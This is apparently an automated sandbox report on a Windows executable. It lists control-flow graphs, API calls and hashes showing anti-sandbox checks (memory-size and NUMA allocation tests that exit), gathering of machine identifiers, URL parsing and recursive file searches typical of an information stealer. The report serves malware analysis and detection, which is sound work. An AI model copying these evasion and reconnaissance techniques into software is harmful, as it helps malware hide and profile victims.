                                • Instruction ID: 0c21bf373b315c059874f03bda44635508fe2111cab6a356e1c42e425860310d
                                • Opcode Fuzzy Hash: 0f019b696fef9ae60c57f2989abfb148073053a1a60cd66265336c49ab27088c
                                • Instruction Fuzzy Hash: 34F12970A01202CFCB64DF69D954AA9B7E6BF44314B1980BED84ADB362DB36DC42CB50

                                Control-flow Graph

                                 Basic blocks (node id, address range, API calls or callee -> successor nodes):
                                 • 2721 6d8ca0-6d8cc4 StrCmpCA -> 2722, 2723
                                 • 2722 6d8ccd-6d8ce6 -> 2725, 2726
                                 • 2723 6d8cc6-6d8cc7 ExitProcess
                                 • 2725 6d8cec-6d8cf1 -> 2727
                                 • 2726 6d8ee2-6d8eef call 6c2a20
                                 • 2727 6d8cf6-6d8cf9 -> 2729, 2730
                                 • 2729 6d8cff -> 2732, 2733, 2734, 2735, 2736, 2737, 2738, 2739, 2740, 2741, 2742, 2743, 2744
                                 • 2730 6d8ec3-6d8edc -> 2726, 2766
                                 • 2732 6d8e6f-6d8e7d StrCmpCA -> 2730, 2757
                                 • 2733 6d8e88-6d8e9a lstrlen -> 2758, 2759
                                 • 2734 6d8d84-6d8d92 StrCmpCA -> 2730, 2748
                                 • 2735 6d8da4-6d8db8 StrCmpCA -> 2730
                                 • 2736 6d8d06-6d8d15 lstrlen -> 2753, 2754
                                 • 2737 6d8dbd-6d8dcb StrCmpCA -> 2730, 2749
                                 • 2738 6d8ddd-6d8deb StrCmpCA -> 2730, 2750
                                 • 2739 6d8dfd-6d8e0b StrCmpCA -> 2730, 2751
                                 • 2740 6d8e1d-6d8e2b StrCmpCA -> 2730, 2752
                                 • 2741 6d8e3d-6d8e4b StrCmpCA -> 2730, 2755
                                 • 2742 6d8d5a-6d8d69 lstrlen -> 2745, 2746
                                 • 2743 6d8e56-6d8e64 StrCmpCA -> 2730, 2756
                                 • 2744 6d8d30-6d8d3f lstrlen -> 2760, 2761
                                 • 2745 6d8d6b-6d8d70 call 6c2a20 -> 2746
                                 • 2746 6d8d73-6d8d7f call 6c2930 -> 2779
                                 • 2748 6d8d98-6d8d9f -> 2730
                                 • 2749 6d8dd1-6d8dd8 -> 2730
                                 • 2750 6d8df1-6d8df8 -> 2730
                                 • 2751 6d8e11-6d8e18 -> 2730
                                 • 2752 6d8e31-6d8e38 -> 2730
                                 • 2753 6d8d1f-6d8d2b call 6c2930 -> 2779
                                 • 2754 6d8d17-6d8d1c call 6c2a20 -> 2753
                                 • 2755 6d8e4d-6d8e54 -> 2730
                                 • 2756 6d8e66-6d8e6d -> 2730
                                 • 2757 6d8e7f-6d8e86 -> 2730
                                 • 2758 6d8e9c-6d8ea1 call 6c2a20 -> 2759
                                 • 2759 6d8ea4-6d8eb0 call 6c2930 -> 2779
                                 • 2760 6d8d49-6d8d55 call 6c2930 -> 2779
                                 • 2761 6d8d41-6d8d46 call 6c2a20 -> 2760
                                 • 2766 6d8cf3 -> 2727
                                 • 2779 6d8eb3-6d8eb5 -> 2730, 2780
                                 • 2780 6d8eb7-6d8eb9 -> 2730, 2781
                                 • 2781 6d8ebb-6d8ebd lstrcpy -> 2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d4c495a734f04a2fc25a0c7ddc341e4551c957a0abfb5297194e86d2740e3a2c
                                • Instruction ID: 6b68ebe2934323f3581208bc8989723cf76bb98b4c854a0ccebba71aef030394
                                • Opcode Fuzzy Hash: d4c495a734f04a2fc25a0c7ddc341e4551c957a0abfb5297194e86d2740e3a2c
                                • Instruction Fuzzy Hash: 19513770E04606EFCB209F76D989E7B7BE6BB54B00B10482EE586D3752DF74A5428F21

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 6e2740-6e2783 GetWindowsDirectoryA 2783 6e278c-6e27ea GetVolumeInformationA 2782->2783 2784 6e2785 2782->2784 2785 6e27ec-6e27f2 2783->2785 2784->2783 2786 6e2809-6e2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 6e27f4-6e2807 2785->2787 2788 6e2826-6e2844 wsprintfA 2786->2788 2789 6e2822-6e2824 2786->2789 2787->2785 2790 6e285b-6e2872 call 6e71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 006E277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006D93B6,00000000,00000000,00000000,00000000), ref: 006E27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2816
                                • wsprintfA.USER32 ref: 006E283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: c4301bcae64526aac294446e9f5902cc5a103e02ead25d8f6c7307f723732ab0
                                • Instruction ID: 338ec5da1294fc3521d847818e61fb127925335160cd975c3e14f905a6b205b8
                                • Opcode Fuzzy Hash: c4301bcae64526aac294446e9f5902cc5a103e02ead25d8f6c7307f723732ab0
                                • Instruction Fuzzy Hash: 27316DB194924A9FCB04CFB98985AEFBFBDFF58710F10016EE505E7650E6349A40CBA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 6c4bc0-6c4bce 2794 6c4bd0-6c4bd5 2793->2794 2794->2794 2795 6c4bd7-6c4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 6c2a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 006C4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006C4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006C4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 006C4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 006C4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 917ef8de12e0e6c44ddcda8f3687fa7ac0cf02ddf17d804125e5098295188d05
                                • Instruction ID: 97729e1e1c4b51348d6a9bdecea54dfc445a5a62989edd450b443b5a0fbcd008
                                • Opcode Fuzzy Hash: 917ef8de12e0e6c44ddcda8f3687fa7ac0cf02ddf17d804125e5098295188d05
                                • Instruction Fuzzy Hash: AD010971D00218ABDB50DBA9E845B9EBBA9EB08320F00412AF914E7290DE7459048B94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 6c1030-6c1055 GetCurrentProcess VirtualAllocExNuma 2799 6c105e-6c107b VirtualAlloc 2798->2799 2800 6c1057-6c1058 ExitProcess 2798->2800 2801 6c107d-6c1080 2799->2801 2802 6c1082-6c1088 2799->2802 2801->2802 2803 6c108a-6c10ab VirtualFree 2802->2803 2804 6c10b1-6c10b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006C1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 006C104D
                                • ExitProcess.KERNEL32 ref: 006C1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006C106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006C10AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 4a058b9cf0140bf028536971e5bdb1216c793b3f4268e5a8e480f87b073b5a1e
                                • Instruction ID: 0dacbf5bcb493939537d65187fd7e8f91a708eb61253103e9d77a2a451a411c0
                                • Opcode Fuzzy Hash: 4a058b9cf0140bf028536971e5bdb1216c793b3f4268e5a8e480f87b073b5a1e
                                • Instruction Fuzzy Hash: A801D171740204BBEB204A756C1AFBA77ADF786B01F208019F744E7281DDB1E9008A68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 6dee90-6deeb5 call 6c2930 2808 6deec9-6deecd call 6c6c40 2805->2808 2809 6deeb7-6deebf 2805->2809 2812 6deed2-6deee8 StrCmpCA 2808->2812 2809->2808 2810 6deec1-6deec3 lstrcpy 2809->2810 2810->2808 2813 6deeea-6def02 call 6c2a20 call 6c2930 2812->2813 2814 6def11-6def18 call 6c2a20 2812->2814 2824 6def45-6defa0 call 6c2a20 * 10 2813->2824 2825 6def04-6def0c 2813->2825 2819 6def20-6def28 2814->2819 2819->2819 2821 6def2a-6def37 call 6c2930 2819->2821 2821->2824 2829 6def39 2821->2829 2825->2824 2828 6def0e-6def0f 2825->2828 2831 6def3e-6def3f lstrcpy 2828->2831 2829->2831 2831->2824
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006DEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006DEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: c2aa5439f1322b6ef7e81d49da0c75bec808b765efaf869bbf3d5331868e5b52
                                • Instruction ID: d105391e3fff50675034f633865b3810e4917da44a662457b42d250f0e9f8574
                                • Opcode Fuzzy Hash: c2aa5439f1322b6ef7e81d49da0c75bec808b765efaf869bbf3d5331868e5b52
                                • Instruction Fuzzy Hash: A221CE70A202469BCB61BFBAD85AFBA77A6EF14300F04546DBC4EDB352DE31D8508794

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 6c10c0-6c10cb 2887 6c10d0-6c10dc 2886->2887 2889 6c10de-6c10f3 GlobalMemoryStatusEx 2887->2889 2890 6c10f5-6c1106 2889->2890 2891 6c1112-6c1114 ExitProcess 2889->2891 2892 6c1108 2890->2892 2893 6c111a-6c111d 2890->2893 2892->2891 2894 6c110a-6c1110 2892->2894 2894->2891 2894->2893
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 2d39bb3dd707fd6b5a463ce42369dd922fc0064cf991773f3a57fc712cc5ef13
                                • Instruction ID: a159f34a4550ed132e1959177c8dbb9dabbad349cf80f6b326d6ddbb6adc1cd2
                                • Opcode Fuzzy Hash: 2d39bb3dd707fd6b5a463ce42369dd922fc0064cf991773f3a57fc712cc5ef13
                                • Instruction Fuzzy Hash: D7F0E2702082449BEB106A64980AF39F7DAEB13350F24092DDE9ACA282EA34C8408127

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 6d8c88-6d8cc4 StrCmpCA 2898 6d8ccd-6d8ce6 2895->2898 2899 6d8cc6-6d8cc7 ExitProcess 2895->2899 2901 6d8cec-6d8cf1 2898->2901 2902 6d8ee2-6d8eef call 6c2a20 2898->2902 2903 6d8cf6-6d8cf9 2901->2903 2905 6d8cff 2903->2905 2906 6d8ec3-6d8edc 2903->2906 2908 6d8e6f-6d8e7d StrCmpCA 2905->2908 2909 6d8e88-6d8e9a lstrlen 2905->2909 2910 6d8d84-6d8d92 StrCmpCA 2905->2910 2911 6d8da4-6d8db8 StrCmpCA 2905->2911 2912 6d8d06-6d8d15 lstrlen 2905->2912 2913 6d8dbd-6d8dcb StrCmpCA 2905->2913 2914 6d8ddd-6d8deb StrCmpCA 2905->2914 2915 6d8dfd-6d8e0b StrCmpCA 2905->2915 2916 6d8e1d-6d8e2b StrCmpCA 2905->2916 2917 6d8e3d-6d8e4b StrCmpCA 2905->2917 2918 6d8d5a-6d8d69 lstrlen 2905->2918 2919 6d8e56-6d8e64 StrCmpCA 2905->2919 2920 6d8d30-6d8d3f lstrlen 2905->2920 2906->2902 2942 6d8cf3 2906->2942 2908->2906 2933 6d8e7f-6d8e86 2908->2933 2934 6d8e9c-6d8ea1 call 6c2a20 2909->2934 2935 6d8ea4-6d8eb0 call 6c2930 2909->2935 2910->2906 2924 6d8d98-6d8d9f 2910->2924 2911->2906 2929 6d8d1f-6d8d2b call 6c2930 2912->2929 2930 6d8d17-6d8d1c call 6c2a20 2912->2930 2913->2906 2925 6d8dd1-6d8dd8 2913->2925 2914->2906 2926 6d8df1-6d8df8 2914->2926 2915->2906 2927 6d8e11-6d8e18 2915->2927 2916->2906 2928 6d8e31-6d8e38 2916->2928 2917->2906 2931 6d8e4d-6d8e54 2917->2931 2921 6d8d6b-6d8d70 call 6c2a20 2918->2921 2922 6d8d73-6d8d7f call 6c2930 2918->2922 2919->2906 2932 6d8e66-6d8e6d 2919->2932 2936 6d8d49-6d8d55 call 6c2930 2920->2936 2937 6d8d41-6d8d46 call 6c2a20 2920->2937 2921->2922 2955 6d8eb3-6d8eb5 2922->2955 2924->2906 2925->2906 2926->2906 2927->2906 2928->2906 2929->2955 2930->2929 2931->2906 2932->2906 2933->2906 2934->2935 2935->2955 2936->2955 2937->2936 2942->2903 2955->2906 2956 6d8eb7-6d8eb9 2955->2956 2956->2906 2957 6d8ebb-6d8ebd lstrcpy 2956->2957 2957->2906
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 2e2d22989a2d6eec2f7641925adcaaf64a0245f3dc7c13d3eee6d46de2f51515
                                • Instruction ID: 53762d37650e7ea42f8839bc37b43bd0ae6da40fe8d114a9ffda4719aef4c0f4
                                • Opcode Fuzzy Hash: 2e2d22989a2d6eec2f7641925adcaaf64a0245f3dc7c13d3eee6d46de2f51515
                                • Instruction Fuzzy Hash: 0EE0DF6050038DFBDB00AFB99C48EDA7B69BF84700F00843AFE4997221EE749E04C368

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2958 6e2ad0-6e2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 6e2b44-6e2b59 2958->2959 2960 6e2b24-6e2b36 2958->2960
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006E2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 006E2B1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 75e07cf636fd31817732d7631bc56923f923d2da84614cd40db595a81dc8d4f5
                                • Instruction ID: 9648d6193823434fc1f8f9db5cff1e5bee0bb73c5b0c53955ec75ff4acfa2f4b
                                • Opcode Fuzzy Hash: 75e07cf636fd31817732d7631bc56923f923d2da84614cd40db595a81dc8d4f5
                                • Instruction Fuzzy Hash: 6201A272A44648ABC710CF99EC45BAAF7B8F744B21F00026AF915D3780DB751900C6A1
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D2402
                                • lstrlen.KERNEL32(\*.*), ref: 006D240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006D2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 6f05832faf7adeb9786dde3335aba9406db247687e41a2a87694414feee3b635
                                • Instruction ID: d4e07713a9511edd318e4f1623b50e31cef1467dbbf68a9826ad3ea666eb0574
                                • Opcode Fuzzy Hash: 6f05832faf7adeb9786dde3335aba9406db247687e41a2a87694414feee3b635
                                • Instruction Fuzzy Hash: FCA23571A116179BCB21AFB6DCA8FBA77BABF54300F044029E84AA7351DB34DD41CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C16E2
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C176C
                                • lstrcat.KERNEL32(00000000), ref: 006C1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1875
                                • lstrcat.KERNEL32(00000000), ref: 006C187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C18FE
                                • lstrlen.KERNEL32(006F1794), ref: 006C1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1929
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1966
                                • lstrlen.KERNEL32(\*.*), ref: 006C1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006C199A
                                  • Part of subcall function 006E4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 006E406D
                                  • Part of subcall function 006E4040: lstrcpy.KERNEL32(00000000,?), ref: 006E40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1A16
                                • lstrlen.KERNEL32(006F1794), ref: 006C1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A41
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1A81
                                • lstrlen.KERNEL32(006F1794), ref: 006C1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1AAC
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006C1B45
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006C1B70
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006C1B8A
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1C03
                                • lstrlen.KERNEL32(006F1794), ref: 006C1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1C31
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1C74
                                • lstrlen.KERNEL32(006F1794), ref: 006C1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1CA2
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1CAE
                                • lstrlen.KERNEL32(?), ref: 006C1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1CE9
                                • lstrlen.KERNEL32(006F1794), ref: 006C1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1D14
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1DEB
                                • lstrlen.KERNEL32(006F1794), ref: 006C1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1E19
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C1E56
                                • lstrlen.KERNEL32(006F1794), ref: 006C1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1E81
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C1E8D
                                • lstrlen.KERNEL32(?), ref: 006C1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006C1F45
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1F9F
                                • lstrlen.KERNEL32(00F18A10), ref: 006C1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1FE3
                                • lstrlen.KERNEL32(006F1794), ref: 006C1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C200E
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C204D
                                • lstrlen.KERNEL32(006F1794), ref: 006C2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2075
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: f11c317e96ff14560ba362772b6953406dc52fc0efe46de956c3d700c30f926e
                                • Instruction ID: 5e5cd1af7b5e512f1e21b8c60adac23d0a88ce926d96f6bb075132833488ebc3
                                • Opcode Fuzzy Hash: f11c317e96ff14560ba362772b6953406dc52fc0efe46de956c3d700c30f926e
                                • Instruction Fuzzy Hash: 7792397191161A9BCB21AFA5D998FBE77BAFF46700F04412CF809AB251DB34DD41CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDBEF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006CDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC17
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006CDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDC4C
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDC8F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006CDCD0
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006CDCF0
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006CDD0A
                                • lstrlen.KERNEL32(006ECFEC), ref: 006CDD1D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006CDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006CDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006CDD7B
